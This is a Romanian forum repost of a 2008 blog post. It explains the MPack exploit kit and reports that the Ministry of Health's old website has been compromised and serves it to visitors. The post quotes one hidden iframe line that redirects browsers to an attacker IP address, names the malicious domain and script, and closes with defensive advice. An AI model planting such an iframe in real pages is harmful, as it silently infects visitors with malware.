Ministerul sanatatii livreaza root-kit-uri (MPack) gratis !!

Vezi subiectul anterior Vezi subiectul urmator In jos

Ministerul sanatatii livreaza root-kit-uri (MPack) gratis !!

Mesaj  Bogo la data de Mier Feb 20, 2008 4:47 pm

Ma hotarisem sa nu scriu despre MPack pentru ca consideram ca este prea cunoscut ca sa mai fie un subiect care sa intereseze pe cineva. Dar se pare ca am fost contrazis de realitate. Astazi am primit urmatorul mail.

Buna ziua

Lucrez la o institutie publica din domeniul sanatatii si ma ocup de partea de IT. Relativ de curind Ministerul Sanatatii si-a actualizat site-ul (http://www.ms.ro/) pastrind totusi activa si varianta veche care este accesibila din noul site http://www.ms.ro / ms_vechi.asp .

Problema (grava) este ca acesta din urma este infectat cu MPack (Wikipedia, http://code-foundation.de/2008/01/31/hunting-mpack-in-the-wild/) un mallware foarte agresiv si ‘eficient’.

Poate gasiti un spatiu pe blogul dumneavoastra in care sa atrageti atentia asupra acestei probleme care afecteaza site-ul unei institutii publice importante din Romania (nu am gasit o adresa de email a webmaster-ul si oricum ma indoiesc ca ar fi folosit la ceva).

Cu stima,
V. M.

Numele domnului care mi-a scris l-am trecut sub anonimat pentru ca nu am obtinut acordul lui, iar adresa paginii de web am scris-o intentionat trunchiat pentru a nu cumva cineva sa aiba ideea de a da click, decit daca stie ce face.

Prima data am analizat versiunea 0,94 a celebrului pachet MPack in decembrie. Am fost impresionat de modul in care functioneaza si de infrastructura care sta in spate.

Dar ce este de fapt MPack si care este vectorul de atac? Pachetul care poate fi obtinut de pe piata neagra pentru preturi variind intre 300 si 1000 de USD, contine scripturile de instalare a interfetei web scrisa in PhP si a unei baze de date mySQL care este folosit ca centru de comanda. Aici sint strinse informatiile despre hosturile noi care au fost explatate cu succes si inclusiv o distributie pe tari. A doua parte sint exploiturile in sine care au ca obiectiv browser-ul in sine (Internet Explorer, Firefox sau Opera) sau plugins-urile sau BHO-urile aferente (QuickTime Player, VLC, Acrobat Reader) urmate de instalarea unui root-kit care permite centrului de comanda sa controleze calculatorul infectat. BHO (Browser Helper Object) in lumea IE-ului sau extensile de la Firefox ajuta browser-ul pentru a putea sa prezinte continutul unui site de web in cazul in care browser-ul in sine nu o poate face. De exemplu filmele pot fii prezentate prin invocarea de catre browser a programului Qicktime Player.

Dar care este anatomia unui atac si cum funtioneaza in cazul Ministerului Sanatatii. Cineva a descoperit ca poate modifica continutul fisierului de pe site-ul ministerului sanatatii. Si a si facut-o incluzind un iframe invizilbil in pagina Ministerului sanatatii care redirectioneaza browserul catre site-ul http://updateservernet.cn si executa fisierul tank.php.

mpack.png

Iframe-urile au fost initial concepute pentru a putea prezenta in site-ul propriu in timp real continutul altui site. Acelasi lucru este folosit si aici unde browserul unui utilizator obisnuit este redirectionat automat catre un alt site fara cunostinta acestuia.

Pe aceste site se gaseste o pagina care contine un alt iframe ce redirectioneaza catre un al doilea site cum se poate vedea mai jos.

iframe src=”http : // 195 . 2 . 253 . 203 / w / wtsin.cgi?s=z” style=”display:none”>

care face apoi redirectarea catre http : // 195 . 2 . 253 . 203 / sp / index.php

Aici are loc exploatare propriuzisa fiind livrat un pachet de exploit-uri in funtie de browserul care acceseaza pagina, urmata de instalarea unui root-kit.

mpack2.png

Simplu nu??

Ce se poate face un user normal?

* Antivirusul la zi cu toate ca Mpack-ul are posibilitatea de a livra noi exploituri care nu sint recunoscute imediat de producatorii de antivirus.
* Evitarea de a naviga pe internet folosind contul de administrator.
* Update-ul tuturor softurilor care sint folosite de catre Internet Explorer sau Firefox (Quicktime Player, VLC, etc) sau chiar dezactivarea lor.
* Dezactivarea posibilitatii de a rula scripturi Java cu toate ca aceasta optiune este din ce in ce mai greu de pus in aplicare datorita constructiei site-urilor de Internet.
* sau…ce spunea unul din creatorii Mpack-ului intr-un interviu in Securit Focus.

I would advise you to use the Opera browser with scripts and plug-ins disabled in order not to be caught by the MPack someday.

Mai multe informatii despre constructia pachetului MPack se poate gasi pe site-ul Antivirusului Panda.

Mi-as dori mai multa atentie din partea departamentelor de IT care sint subordonate Ministerelor, nu numai pentru ca in primul rind sint responsabile de securitatea retelelor si site-ului proprii dar si datorita faptului ca fiind institutii publice au un numar de accesari foarte mare care poate duce ca in cazul de fata la infectari dramatice.

P.S. Cautarile mele ca si ale domnului V.M de a gasi o persoana de contact raspunzatoare de site-ul Ministerului Sanatatii au fost soldate cu un esec lamentabil si deci daca cineva cunoaste pe Cineva in Ministerul Sanatarii va rog sa-i contactati sa-si curete ograda. Multumesc.




SURSA Wordpress
avatar
Bogo
Master Admin
Master Admin

masculin
Numarul mesajelor : 96
Varsta : 31
Localitate : Piatra Neamt/Bucuresti
Ocupatie/Profesie Actuala : Administrator Forum/Liber Profesionist
Data de inscriere : 23/06/2007

Vezi profilul utilizatorului http://www.cazacubogdan.blogspot.com

Sus In jos

Vezi subiectul anterior Vezi subiectul urmator Sus


 
Permisiunile acestui forum:
Nu puteti raspunde la subiectele acestui forum